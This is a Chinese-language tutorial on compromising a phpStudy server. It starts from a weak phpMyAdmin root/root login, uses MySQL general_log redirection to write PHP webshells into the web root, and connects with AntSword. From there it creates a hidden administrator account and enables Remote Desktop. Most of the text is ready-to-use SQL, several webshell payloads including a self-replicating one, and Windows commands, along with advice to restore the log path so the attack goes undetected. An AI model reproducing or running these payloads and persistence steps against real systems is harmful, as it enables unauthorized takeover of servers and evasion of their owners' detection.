有人用过phpstudy搭建环境吗?
今天来讲述如何从phpmyadmin弱口令到新建管理员用户登录对方设备的攻击过程。
如果你的登录密码是弱口令的话,这是很危险的,比如说root、root.
你的ip如果在公网上的话,即使你的密码改了,也有被爆破的风险。
利用phpmyadmin来写木马
前提:主要对是弱口令(用户:root 密码:root)开启phpadmin的
满足条件:
1.ip/phpmyadmin进入,以root、root登录
2.查看日志开关为off还是on
show variables like '%general_log%';
查看日志开关为off还是on
如果关,就打开
set global general_log = on;
保存一下日志的原始路径(便于之后恢复他的路径不被发觉)
C:\phpStudy\PHPTutorial\MySQL\data\USER-20181210FI.
查询并设置输出类型
show variables like 'log_output'; -- 看看日志输出类型 table或file
set global log_output='table'; -- 设置输出类型为 table
set global log_output='file'; -- 设置输出类型为file
log_output=’FILE’ 表示将日志存入文件,默认值是FILE
log_output=’TABLE’表示将日志存入数据库,这样日志信息就会被写入到mysql.slow_log表中.
2.1 如果on 就开始改日志路径
set global general_log_file = "C:\\phpStudy\\PHPTutorial\\WWW\\abc.php";(根据原始日志路径去填写)
注意:\\ 一定是两个
改写成功开始传马
然后在查询框填写木马,先传一句话
select '<?php eval($_POST[xy]);?>'; 简单的
发现还有另一种JS(javascript)脚本风格的写法
<script language="PHP"> @eval($_POST["code"]); </script>
<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>
不死马/
<?php fputs(fopen(“shell.php”,”w”),’<?php system($_GET['cmd']);?>’);?>
<?php fputs(fopen('test.php','w'),'<?php @system($_GET[test]);?>');?>
select '<?php eval($_POST[a]); ?>' into outfile '/var/www/html/1.php'
上传成功
蚁剑开始连接一句话
连接成功
开启虚拟终端 开始创建用户
net user win77 abc..123 /add 创建用户win77
用户 win77 密码 abc..123
将用户加入administrators组中,获取管理员权
net localgroup administrators win77 /add
net user win77 查看用户信息,假如用户也在users族中就用下面的命令给删除
net localgroup users wini77 /del 删除用户在users组
下面查看端口,用户有没有开启3389端口
netstat -an
没开就用命令打开3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
看到回显成功了
接下来用自己的pc 去连接靶机
win+R 输入mstsc
输入win77的用户名 密码然后登陆
然后就连接成功了
下面是虚拟机测试成功地回答
本文暂时没有评论,来添加一个吧(●'◡'●)